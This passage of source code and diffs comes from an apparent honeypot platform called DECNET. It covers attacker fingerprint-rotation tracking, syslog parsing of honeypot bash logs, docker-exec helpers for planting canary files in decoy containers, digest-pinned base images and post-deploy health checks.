``attacker.fingerprint_rotated`` event (bus + RFC 5424 syslog) and
stamps the ``Attacker`` row's rotation telemetry.
This is a pure library — no daemon, no async loop. The prober is the
only producer. We just teach it to derive a second event on hash
flip without standing up another worker (DEBT-032).
"""
from __future__ import annotations
import uuid as _uuid
from dataclasses import dataclass
from datetime import datetime
from typing import Any, Callable, Literal
from sqlmodel import Session, select
from decnet.web.db.models import Attacker, AttackerFingerprintState
ProbeType = Literal["jarm", "hassh", "tcpfp"]
RotationKind = Literal[
"no_attacker_row", # caller raced ahead of correlator; skip silently
"first_sighting", # state row created, no prior hash
"unchanged", # same hash as last sighting
"rotated", # hash differs; event emitted, Attacker stamped
]
PublishFn = Callable[[str, dict[str, Any]], None]
SyslogFn = Callable[[str, dict[str, Any]], None]
@dataclass
class RotationOutcome:
"""Return shape of :func:`record_fingerprint`. Caller usually
ignores it; useful for tests + tracing."""
kind: RotationKind
old_hash: str | None
new_hash: str
rotation_count: int
_ROTATED_EVENT_TYPE = "attacker.fingerprint_rotated"
def record_fingerprint(
session: Session,
*,
attacker_ip: str,
port: int,
probe_type: ProbeType,
new_hash: str,
ts: datetime,
publish_fn: PublishFn | None = None,
syslog_fn: SyslogFn | None = None,
) -> RotationOutcome:
"""Upsert state row; on hash diff, emit derived event + stamp.
Resolves ``attacker_uuid`` from ``attacker_ip`` via the existing
Attacker table. If no Attacker row exists yet (the prober raced
ahead of the correlator), returns ``kind="no_attacker_row"`` and
does nothing — the next probe cycle will pick it up once the
correlator has caught up.
State upsert + Attacker stamp + publish + syslog are committed in
one transaction so a partial failure can't desync state from
what was emitted.
"""
attacker = session.exec(
select(Attacker).where(Attacker.ip == attacker_ip)
).first()
if attacker is None:
return RotationOutcome(
kind="no_attacker_row",
old_hash=None,
new_hash=new_hash,
rotation_count=0,
)
row = session.exec(
select(AttackerFingerprintState).where(
AttackerFingerprintState.attacker_uuid == attacker.uuid,
AttackerFingerprintState.port == port,
AttackerFingerprintState.probe_type == probe_type,
)
).first()
if row is None:
session.add(AttackerFingerprintState(
uuid=str(_uuid.uuid4()),
attacker_uuid=attacker.uuid,
port=port,
probe_type=probe_type,
last_hash=new_hash,
last_seen=ts,
rotation_count=0,
))
session.commit()
return RotationOutcome(
kind="first_sighting",
old_hash=None,
new_hash=new_hash,
rotation_count=0,
)
if row.last_hash == new_hash:
row.last_seen = ts
session.add(row)
session.commit()
return RotationOutcome(
kind="unchanged",
old_hash=row.last_hash,
new_hash=new_hash,
rotation_count=row.rotation_count,
)
old_hash = row.last_hash
row.last_hash = new_hash
row.last_seen = ts
row.rotation_count += 1
session.add(row)
attacker.rotation_count += 1
attacker.last_rotation_at = ts
session.add(attacker)
payload: dict[str, Any] = {
"attacker_uuid": attacker.uuid,
"attacker_ip": attacker_ip,
"port": port,
"probe_type": probe_type,
"old_hash": old_hash,
"new_hash": new_hash,
"rotation_count": row.rotation_count,
"ts": ts.isoformat(),
}
if publish_fn is not None:
publish_fn(_ROTATED_EVENT_TYPE, payload)
if syslog_fn is not None:
syslog_fn(_ROTATED_EVENT_TYPE, payload)
session.commit()
return RotationOutcome(
kind="rotated",
old_hash=old_hash,
new_hash=new_hash,
rotation_count=row.rotation_count,
)

View File

@@ -32,6 +32,21 @@ _RFC5424_RE = re.compile(
r"(.+)$", # 5: SD element + optional MSG r"(.+)$", # 5: SD element + optional MSG
) )
# Honeypot SSH PROMPT_COMMAND lines arrive double-wrapped: the
# Docker-stdout collector envelope wraps the inner ``logger
# --rfc5424 --msgid command -t bash …`` line. Outer MSGID is NIL,
# real MSGID lives in the body. Mirrors the unwrap logic in
# ``decnet.collector.worker._INNER_RFC5424_RE`` — the two parsers
# read the same on-wire format.
_INNER_RFC5424_RE = re.compile(
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
r"(\S+)\s+" # 2: inner HOSTNAME
r"(\S+)\s+" # 3: inner APP-NAME
r"\S+\s+" # PROCID (NIL or PID)
r"(\S+)\s+" # 4: inner MSGID
r"(.+)$", # 5: inner SD/MSG remainder
)
# Structured data block: [relay@55555 k="v" ...] # Structured data block: [relay@55555 k="v" ...]
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL) _SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
@@ -121,6 +136,21 @@ def parse_line(line: str) -> LogEvent | None:
ts_raw, decky, service, event_type, sd_rest = m.groups() ts_raw, decky, service, event_type, sd_rest = m.groups()
# Unwrap double-wrapped Docker-stdout envelopes around bash
# PROMPT_COMMAND lines. See ``_INNER_RFC5424_RE`` and the matching
# logic in ``decnet.collector.worker.parse_rfc5424``. Must run
# before the decky/service NIL-guard below — the OUTER decky is
# the docker host, the inner header carries the real source.
if event_type == "-" and sd_rest.startswith("-"):
body = sd_rest[1:].lstrip()
inner = _INNER_RFC5424_RE.match(body)
if inner is not None:
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
decky = i_host
service = i_app
event_type = i_msgid
sd_rest = i_rest
if decky == "-" or service == "-": if decky == "-" or service == "-":
return None return None
@@ -137,6 +167,19 @@ def parse_line(line: str) -> LogEvent | None:
msg = tail.group(1).strip() if tail else "" msg = tail.group(1).strip() if tail else ""
attacker_ip = _extract_attacker_ip(fields, msg) attacker_ip = _extract_attacker_ip(fields, msg)
# Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
# and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
# Without this rewrite they're invisible to the behavioral profiler, which
# filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
# invocation uses --msgid command, so we must also handle the non-nil case.
if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
event_type = "command"
head, sep, cmd_rest = msg[4:].partition("cmd=")
for k, v in re.findall(r'(\w+)=(\S+)', head):
fields.setdefault(k, v)
if sep:
fields.setdefault("command", cmd_rest)
# Mutator-emitted transitions arrive on the same ingest stream but # Mutator-emitted transitions arrive on the same ingest stream but
# belong in the substrate-state index, not the per-IP attacker one. # belong in the substrate-state index, not the per-IP attacker one.
kind: EventKind = ( kind: EventKind = (

View File

@@ -70,7 +70,7 @@ async def run_reuse_loop(
wake_tasks.append(asyncio.create_task( wake_tasks.append(asyncio.create_task(
_run_control_listener_signal(bus, "reuse-correlator"), _run_control_listener_signal(bus, "reuse-correlator"),
)) ))
except Exception as exc: # noqa: BLE001 except Exception as exc:
log.warning( log.warning(
"reuse correlator: bus unavailable, running in poll-only mode: %s", "reuse correlator: bus unavailable, running in poll-only mode: %s",
exc, exc,
@@ -86,7 +86,7 @@ async def run_reuse_loop(
results = await engine.correlate_credential_reuse( results = await engine.correlate_credential_reuse(
repo, min_targets=min_targets, repo, min_targets=min_targets,
) )
except Exception: # noqa: BLE001 except Exception:
log.exception("reuse correlator: tick failed") log.exception("reuse correlator: tick failed")
results = [] results = []
@@ -120,11 +120,11 @@ async def run_reuse_loop(
t.cancel() t.cancel()
if heartbeat_task is not None: if heartbeat_task is not None:
heartbeat_task.cancel() heartbeat_task.cancel()
for t in (*wake_tasks, heartbeat_task): for task in (*wake_tasks, heartbeat_task):
if t is None: if task is None:
continue continue
with contextlib.suppress(asyncio.CancelledError, Exception): with contextlib.suppress(asyncio.CancelledError, Exception):
await t await task
if bus is not None: if bus is not None:
with contextlib.suppress(Exception): with contextlib.suppress(Exception):
await bus.close() await bus.close()
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
wake.set() wake.set()
except asyncio.CancelledError: except asyncio.CancelledError:
raise raise
except Exception as exc: # noqa: BLE001 except Exception as exc:
log.warning( log.warning(
"reuse correlator: subscriber for %s died (%s); falling back to poll", "reuse correlator: subscriber for %s died (%s); falling back to poll",
pattern, exc, pattern, exc,

View File

@@ -0,0 +1,39 @@
"""Shared primitives for writing/deleting files inside running deckies.
The canary planter and the orchestrator SSH driver both need to drop
bytes into a decky container's filesystem, then sometimes unlink them.
The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
before this module existed.
Public API:
* :func:`write_file_to_container` — write bytes at a path, set mode,
optionally backdate mtime.
* :func:`delete_file_from_container` — best-effort ``rm -f``.
* :func:`resolve_topology_container` — pick the right docker container
for a MazeNET decky based on its services list.
* :func:`resolve_decky_container` — async helper that takes
``(decky_name, topology_id?)``, hydrates the topology when needed,
and returns the docker container name.
Container resolution conventions are documented in
:mod:`decnet.topology.compose`; we mirror them here without taking
a runtime dependency on the compose generator.
"""
from __future__ import annotations
from .resolve import (
resolve_decky_container,
resolve_topology_container,
)
from .write import (
delete_file_from_container,
write_file_to_container,
)
__all__ = [
"delete_file_from_container",
"resolve_decky_container",
"resolve_topology_container",
"write_file_to_container",
]

View File

@@ -0,0 +1,72 @@
"""Decky-name → docker container name resolution.
Two scopes:
* **Fleet**: every fleet decky has a ``ssh`` service container named
``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`). We always
target it because it carries the most realistic filesystem layout.
* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
decky exposes the ssh service; otherwise the decky's base container
named ``decnet_t_<topology_id8>_<decky_name>`` (matches
:func:`decnet.topology.compose._container_name`).
Keeping resolution centralised here means new ``docker exec`` callers
(file drops, future bulk planters, etc.) never need to learn the
naming conventions — they just call :func:`resolve_decky_container`.
"""
from __future__ import annotations
from typing import Any, Iterable, Optional
_SSH_CONTAINER_SUFFIX = "-ssh"
def resolve_topology_container(
topology_id: str, decky_name: str, services: Iterable[str],
) -> str:
"""Container name for a MazeNET decky.
See module docstring for the convention. Pure function — no I/O.
"""
if "ssh" in set(services):
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
return f"decnet_t_{topology_id[:8]}_{decky_name}"
async def resolve_decky_container(
repo: Any,
decky_name: str,
*,
topology_id: Optional[str] = None,
) -> str:
"""Resolve the docker container name for *decky_name*.
Fleet path (``topology_id is None``): returns ``<decky_name>-ssh``
unconditionally. No DB lookup — the caller is responsible for
knowing the decky exists; if it doesn't, the subsequent
``docker exec`` returns a clear error.
Topology path: hydrates the topology, looks up the decky's services
list, delegates to :func:`resolve_topology_container`.
Raises:
LookupError — when ``topology_id`` is set but the topology or
its named decky doesn't exist. Callers translate this into
404/422 at the API layer.
"""
if topology_id is None:
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
from decnet.topology.persistence import hydrate
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
raise LookupError(f"topology {topology_id!r} not found")
for decky in hydrated["deckies"]:
cfg = decky.get("decky_config") or {}
name = cfg.get("name") or decky.get("name")
if name == decky_name:
services = decky.get("services") or []
return resolve_topology_container(topology_id, decky_name, services)
raise LookupError(
f"decky {decky_name!r} is not in topology {topology_id!r}"
)

124
decnet/decky_io/write.py Normal file
View File

@@ -0,0 +1,124 @@
"""``docker exec``-driven file write/delete inside a decky container.
The write path streams a base64-encoded payload over stdin to
``base64 -d`` inside the container, so binary content of any size up
to docker's stream limits is safe — interpolating bytes into argv
would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
"""
from __future__ import annotations
import asyncio
import base64
import shlex
from datetime import datetime, timezone
from typing import Optional
from decnet.logging import get_logger
log = get_logger("decky_io.write")
_DOCKER = "docker"
_DEFAULT_TIMEOUT = 8.0
def _dirname(path: str) -> str:
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]
async def _run(
argv: list[str],
*,
stdin_bytes: Optional[bytes] = None,
timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[int, str, str]:
try:
proc = await asyncio.create_subprocess_exec(
*argv,
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
except FileNotFoundError as exc:
return 127, "", f"argv[0] not found: {exc}"
try:
stdout, stderr = await asyncio.wait_for(
proc.communicate(input=stdin_bytes), timeout=timeout,
)
except asyncio.TimeoutError:
try:
proc.kill()
except ProcessLookupError:
pass
return 124, "", "timeout"
return (
proc.returncode if proc.returncode is not None else -1,
stdout.decode("utf-8", "replace"),
stderr.decode("utf-8", "replace"),
)
async def write_file_to_container(
container: str,
path: str,
content: bytes,
*,
mode: int = 0o644,
mtime: Optional[datetime] = None,
timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
"""Write *content* to *path* inside *container* via ``docker exec``.
The directory above *path* is created if missing; *mode* is applied
after the write; when *mtime* is provided the file is backdated via
``touch -d`` (UTC ISO 8601).
Returns ``(success, error_or_none)``. ``error`` is the trimmed
docker stderr on rc != 0, or a short "rc=<n>" if stderr was empty.
"""
if not path:
return False, "empty path"
encoded = base64.b64encode(content)
parts = [
f"mkdir -p {shlex.quote(_dirname(path))}",
f"base64 -d > {shlex.quote(path)}",
f"chmod {mode:o} {shlex.quote(path)}",
]
if mtime is not None:
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
parts.append(f"touch -d {shlex.quote(ts)} {shlex.quote(path)}")
sh_cmd = " && ".join(parts)
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv, stdin_bytes=encoded, timeout=timeout)
success = rc == 0
if success:
return True, None
err = stderr.strip()[:256] or f"rc={rc}"
log.warning(
"decky_io.write failed container=%s path=%s rc=%d stderr=%r",
container, path, rc, stderr[:120],
)
return False, err
async def delete_file_from_container(
container: str,
path: str,
*,
timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
"""Best-effort ``rm -f`` of *path* inside *container*.
Returns ``(success, error_or_none)``. ``rm -f`` returns rc=0 even
when the file is already gone, so a True result here means "the
file is not present after this call", regardless of who unlinked it.
"""
sh_cmd = f"rm -f {shlex.quote(path)}"
argv = [_DOCKER, "exec", container, "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv, timeout=timeout)
if rc == 0:
return True, None
return False, stderr.strip()[:256] or f"rc={rc}"

View File

@@ -18,69 +18,86 @@ class DistroProfile:
build_base: str # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE}) build_base: str # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE})
# Base images are pinned by digest (sha256) to make `docker pull`
# reproducible — a registry-side rebuild of "debian:bookworm-slim"
# can't silently swap content under us. The :tag is kept for human
# readability; the @sha256 is what Docker actually resolves.
# Refresh procedure: `docker pull <tag>` then `docker inspect
# --format '{{index .RepoDigests 0}}' <tag>`. Last refreshed 2026-05-03.
_DEBIAN_BOOKWORM = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"
_UBUNTU_22_04 = "ubuntu:22.04@sha256:962f6cadeae0ea6284001009daa4cc9a8c37e75d1f5191cf0eb83fe565b63dd7"
_UBUNTU_20_04 = "ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214"
_ROCKY_9 = "rockylinux:9-minimal@sha256:305de618a5681ff75b1d608fd22b10f362867dff2f550a4f1d427d21cd7f42b4"
_CENTOS_7 = "centos:7@sha256:be65f488b7764ad3638f236b7b515b3678369a5124c47b8d32916d6487418ea4"
_ALPINE_3_19 = "alpine:3.19@sha256:6baf43584bcb78f2e5847d1de515f23499913ac9f12bdf834811a3145eb11ca1"
_FEDORA_39 = "fedora:39@sha256:d63d63fe593749a5e8dbc8152427d40bbe0ece53d884e00e5f3b44859efa5077"
_KALI_ROLLING = "kalilinux/kali-rolling@sha256:1fd0364490011f245688c6ed9fee498a11cd779badfbb0b1d3a721d0f49f2d15"
_ARCH_LATEST = "archlinux:latest@sha256:5ba8bb318666baef4d33afefc0e65db80f38b23503cb8e7b150d315cc2d4d5da"
DISTROS: dict[str, DistroProfile] = { DISTROS: dict[str, DistroProfile] = {
"debian": DistroProfile( "debian": DistroProfile(
slug="debian", slug="debian",
image="debian:bookworm-slim", image=_DEBIAN_BOOKWORM,
display_name="Debian 12 (Bookworm)", display_name="Debian 12 (Bookworm)",
hostname_style="generic", hostname_style="generic",
build_base="debian:bookworm-slim", build_base=_DEBIAN_BOOKWORM,
), ),
"ubuntu22": DistroProfile( "ubuntu22": DistroProfile(
slug="ubuntu22", slug="ubuntu22",
image="ubuntu:22.04", image=_UBUNTU_22_04,
display_name="Ubuntu 22.04 LTS (Jammy)", display_name="Ubuntu 22.04 LTS (Jammy)",
hostname_style="generic", hostname_style="generic",
build_base="ubuntu:22.04", build_base=_UBUNTU_22_04,
), ),
"ubuntu20": DistroProfile( "ubuntu20": DistroProfile(
slug="ubuntu20", slug="ubuntu20",
image="ubuntu:20.04", image=_UBUNTU_20_04,
display_name="Ubuntu 20.04 LTS (Focal)", display_name="Ubuntu 20.04 LTS (Focal)",
hostname_style="generic", hostname_style="generic",
build_base="ubuntu:20.04", build_base=_UBUNTU_20_04,
), ),
"rocky9": DistroProfile( "rocky9": DistroProfile(
slug="rocky9", slug="rocky9",
image="rockylinux:9-minimal", image=_ROCKY_9,
display_name="Rocky Linux 9", display_name="Rocky Linux 9",
hostname_style="rhel", hostname_style="rhel",
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
), ),
"centos7": DistroProfile( "centos7": DistroProfile(
slug="centos7", slug="centos7",
image="centos:7", image=_CENTOS_7,
display_name="CentOS 7", display_name="CentOS 7",
hostname_style="rhel", hostname_style="rhel",
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
), ),
"alpine": DistroProfile( "alpine": DistroProfile(
slug="alpine", slug="alpine",
image="alpine:3.19", image=_ALPINE_3_19,
display_name="Alpine Linux 3.19", display_name="Alpine Linux 3.19",
hostname_style="minimal", hostname_style="minimal",
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
), ),
"fedora": DistroProfile( "fedora": DistroProfile(
slug="fedora", slug="fedora",
image="fedora:39", image=_FEDORA_39,
display_name="Fedora 39", display_name="Fedora 39",
hostname_style="rhel", hostname_style="rhel",
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
), ),
"kali": DistroProfile( "kali": DistroProfile(
slug="kali", slug="kali",
image="kalilinux/kali-rolling", image=_KALI_ROLLING,
display_name="Kali Linux (Rolling)", display_name="Kali Linux (Rolling)",
hostname_style="rolling", hostname_style="rolling",
build_base="kalilinux/kali-rolling", # Debian-based, apt-get compatible build_base=_KALI_ROLLING, # Debian-based, apt-get compatible
), ),
"arch": DistroProfile( "arch": DistroProfile(
slug="arch", slug="arch",
image="archlinux:latest", image=_ARCH_LATEST,
display_name="Arch Linux", display_name="Arch Linux",
hostname_style="rolling", hostname_style="rolling",
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
), ),
} }

View File

@@ -3,6 +3,7 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
""" """
import asyncio import asyncio
import json
import shutil import shutil
import subprocess # nosec B404 import subprocess # nosec B404
import time import time
@@ -57,6 +58,8 @@ _CANONICAL_AUTH_HELPER_DIR = Path(__file__).parent.parent / "templates" / "_shar
_AUTH_HELPER_SERVICES = {"ssh", "telnet"} _AUTH_HELPER_SERVICES = {"ssh", "telnet"}
_CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py" _CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py"
_NTLMSSP_SERVICES = {"smb", "rdp"} _NTLMSSP_SERVICES = {"smb", "rdp"}
_CANONICAL_CADDY_MODULES_DIR = Path(__file__).parent.parent / "templates" / "_caddy_modules"
_CADDY_SERVICES = {"http", "https"}
def _sync_logging_helper(config: DecnetConfig) -> None: def _sync_logging_helper(config: DecnetConfig) -> None:
@@ -163,6 +166,104 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
shutil.copy2(src, dest) shutil.copy2(src, dest)
def _chown_tree(dest: Path, owner_ref: Path) -> None:
"""Recursively set uid/gid of *dest* to match *owner_ref*. No-op if not root."""
import os
if os.geteuid() != 0:
return
st = owner_ref.stat()
uid, gid = st.st_uid, st.st_gid
targets = [dest] + list(dest.rglob("*")) if dest.is_dir() else [dest]
for p in targets:
try:
os.lchown(p, uid, gid)
except OSError:
pass
def _sync_caddy_modules(config: DecnetConfig) -> None:
"""Mirror _caddy_modules/ into http/https build contexts.
The xcaddy builder stage in each Dockerfile references
``_caddy_modules/decnetfp`` relative to its build context (the
per-service template dir). Since the canonical source lives one
level up at ``templates/_caddy_modules/``, we sync it into each
active http/https build context before compose up, mirroring the
sessrec / auth-helper patterns.
"""
from decnet.services.registry import get_service
src_dir = _CANONICAL_CADDY_MODULES_DIR
if not src_dir.is_dir():
return
seen: set[Path] = set()
for decky in config.deckies:
for svc_name in decky.services:
if svc_name not in _CADDY_SERVICES:
continue
svc = get_service(svc_name)
if svc is None:
continue
ctx = svc.dockerfile_context()
if ctx is None or ctx in seen:
continue
seen.add(ctx)
dest_dir = ctx / "_caddy_modules"
dest_dir.mkdir(exist_ok=True)
for child in src_dir.iterdir():
dest_child = dest_dir / child.name
if child.is_dir():
if dest_child.exists():
shutil.rmtree(dest_child)
shutil.copytree(child, dest_child)
_chown_tree(dest_child, src_dir)
else:
if not dest_child.exists() or dest_child.read_bytes() != child.read_bytes():
shutil.copy2(child, dest_child)
_chown_tree(dest_child, src_dir)
def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
"""Return ``docker compose ps`` rows for *compose_file* as parsed JSON.
Used for post-deploy verification: ``compose up -d`` returns 0 the
moment containers are *started*, but a service that crashes on boot
(port collision, bad image, missing dependency) only shows up here.
Returns an empty list when compose has nothing to report (and on
parse failure — caller treats that as 'unverifiable, don't gate').
"""
cmd = [
"docker", "compose", "-p", "decnet", "-f", str(compose_file),
"ps", "--all", "--format", "json",
]
try:
result = subprocess.run( # nosec B603
cmd, capture_output=True, text=True, check=False,
)
except FileNotFoundError:
return []
if result.returncode != 0:
return []
rows: list[dict[str, object]] = []
# ``docker compose ps --format json`` emits one JSON object per line
# (newline-delimited), not a JSON array. Parse line-by-line so a
# single bad line doesn't poison the whole result.
for line in (result.stdout or "").splitlines():
line = line.strip()
if not line:
continue
try:
obj = json.loads(line)
except json.JSONDecodeError:
continue
if isinstance(obj, dict):
rows.append(obj)
elif isinstance(obj, list):
for item in obj:
if isinstance(item, dict):
rows.append(item)
return rows
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None: def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
import os import os
# -p decnet pins the compose project name. Without it, docker compose # -p decnet pins the compose project name. Without it, docker compose
@@ -393,6 +494,8 @@ def _compose_with_retry(
console.print(f"[red]{result.stderr.strip()}[/]") console.print(f"[red]{result.stderr.strip()}[/]")
log.error("docker compose %s failed after %d attempts: %s", log.error("docker compose %s failed after %d attempts: %s",
" ".join(args), retries, result.stderr.strip()) " ".join(args), retries, result.stderr.strip())
if last_exc is None: # pragma: no cover — retries=0 is not a supported call
raise RuntimeError("_compose_with_retry exhausted retries without capturing an error")
raise last_exc raise last_exc
@@ -562,6 +665,7 @@ def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False,
_sync_sessrec_sources(config) _sync_sessrec_sources(config)
_sync_auth_helper_sources(config) _sync_auth_helper_sources(config)
_sync_ntlmssp_sources(config) _sync_ntlmssp_sources(config)
_sync_caddy_modules(config)
compose_path = write_compose(config, COMPOSE_FILE) compose_path = write_compose(config, COMPOSE_FILE)
console.print(f"[bold cyan]Compose file written[/] → {compose_path}") console.print(f"[bold cyan]Compose file written[/] → {compose_path}")
@@ -951,8 +1055,84 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
) )
raise raise
await transition_status(repo, topology_id, TopologyStatus.ACTIVE) # Post-deploy verification: ``compose up -d`` returns 0 the moment
log.info("topology %s deployed n_lans=%d", topology_id, len(lans)) # containers are *started*, so a service that crashes on boot
# (port bind failure, bad image, missing dependency) leaves the
# topology row sitting at ACTIVE while half the substrate is dead.
# Sample compose ps once and downgrade to DEGRADED if any expected
# container isn't running — operators see real state instead of an
# optimistic flag.
ps_rows = await anyio.to_thread.run_sync(
lambda: _compose_ps(compose_path),
)
bad: list[str] = []
# Build the per-decky state map. The base container's compose
# service name == decky name, which is what we cache on the
# TopologyDecky row. Service containers (named ``<decky>-<svc>``)
# don't gate the decky's state — service-level failures are visible
# in compose ps separately and don't downgrade the decky as a whole.
decky_state_by_name: dict[str, str] = {}
for row in ps_rows:
state = str(row.get("State", "")).lower()
service_name = str(row.get("Service") or "")
if service_name and "-" not in service_name:
# Plain decky base; cache its docker state.
decky_state_by_name[service_name] = state or "unknown"
if state and state != "running":
name = str(row.get("Name") or row.get("Service") or "?")
exit_code = row.get("ExitCode")
bad.append(
f"{name}={state}"
+ (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
)
# Reconcile each TopologyDecky.state from compose's view. Without
# this, the row stays at the default 'pending' forever and the
# dashboard's ACTIVE DECKIES count reads 0/N even when everything's
# actually up.
for decky in hydrated["deckies"]:
cfg = decky.get("decky_config") or {}
decky_name = cfg.get("name") or decky.get("name")
if not decky_name:
continue
ds = decky_state_by_name.get(decky_name, "unknown")
new_state = "running" if ds == "running" else "failed"
try:
await repo.update_topology_decky(
decky["uuid"], {"state": new_state},
)
except Exception as exc: # noqa: BLE001
log.warning(
"post-deploy state reconcile failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
if bad:
reason = "post-deploy check: " + ", ".join(bad[:8]) + (
f" and {len(bad) - 8} more" if len(bad) > 8 else ""
)
await transition_status(
repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
)
log.warning(
"topology %s deployed but %d container(s) unhealthy: %s",
topology_id, len(bad), reason,
)
else:
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
# Best-effort canary baseline seed across every decky in the
# topology. Same resilience contract as the fleet path: failures
# surface as state=failed token rows, never abort the deploy.
try:
from decnet.canary import planter as _canary_planter
await _canary_planter.seed_baseline_topology(repo, topology_id)
except Exception as exc: # noqa: BLE001
log.warning(
"canary baseline seed failed (best-effort) topology=%s err=%s",
topology_id, exc,
)
@_traced("engine.teardown_topology") @_traced("engine.teardown_topology")

View File

@@ -0,0 +1,673 @@
"""Add/remove a single service on a deployed decky without full redeploy.
The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
supports per-service targeting (``up --no-deps -d <svc>``,
``stop <svc>``, ``rm -f <svc>``). What was missing was the
orchestration: regenerate the compose file (so future redeploys reflect
the change), persist the new ``services`` list, and run the targeted
compose command.
Two scopes:
* **Topology** — source of truth is the ``topology_deckies`` table; the
compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
* **Fleet** — source of truth is ``decnet-state.json`` (with the
``fleet_deckies`` table mirroring it); compose is the unihost
``decnet-compose.yml``.
Both publish ``decky.<name>.service.added`` /
``decky.<name>.service.removed`` on the bus. The new topic constants
are documented in ``wiki-checkout/Service-Bus.md``.
"""
from __future__ import annotations
import subprocess # nosec B404
from pathlib import Path
from typing import Any, Literal, Optional
import anyio
from decnet.bus import topics
from decnet.logging import get_logger
from decnet.services.base import BaseService
from decnet.services.registry import get_service
from decnet.topology.persistence import hydrate
from decnet.web.db.repository import BaseRepository
# Heavy imports (composer/deployer pull in decnet.network → docker) are
# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
# / ``_load_state`` indirection helpers below. Mirrors the lazy-import
# pattern in decnet.canary.planter for the same reason.
def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
"""Indirection so tests can ``monkeypatch.setattr(services_live, '_compose', ...)``.
Real implementation lives in :mod:`decnet.engine.deployer`; we
import-and-delegate at call time to keep this module's import graph
clean (see module docstring above).
"""
from decnet.engine.deployer import _compose as _real_compose
if compose_file is None:
_real_compose(*args, env=env)
else:
_real_compose(*args, compose_file=compose_file, env=env)
def _topology_compose_path(topology_id: str) -> Path:
from decnet.engine.deployer import _topology_compose_path as _real_path
return _real_path(topology_id)
def _write_topology_compose(hydrated, path: Path) -> Path:
from decnet.topology.compose import write_topology_compose
return write_topology_compose(hydrated, path)
def _load_state():
from decnet.config import load_state as _real_load_state
return _real_load_state()
def _save_state(config, compose_path) -> None:
from decnet.config import save_state as _real_save_state
_real_save_state(config, compose_path)
def _write_compose(config, compose_path) -> None:
from decnet.composer import write_compose as _real_write_compose
_real_write_compose(config, compose_path)
def _get_bus():
from decnet.bus.factory import get_bus
return get_bus()
# --------------------------- swarm propagation helpers ---------------------------
#
# Service mutations (add/remove/update_config) on a deployed decky used to run
# the master's local docker-compose only. For swarm fleet deckies the master
# has no containers; for agent-targeted topologies the master only writes a
# compose file the worker never sees. These helpers replay the change to the
# worker so the env actually lands.
#
# Lazy imports keep this module's import graph clean (composer/swarm pull in
# decnet.network → docker, mirroring the pattern used elsewhere in this file).
async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
"""Return ``host_uuid`` if a fleet decky lives on a swarm worker, else None."""
shards = await repo.list_decky_shards()
for s in shards:
if s.get("decky_name") == decky_name:
return s.get("host_uuid")
return None
async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
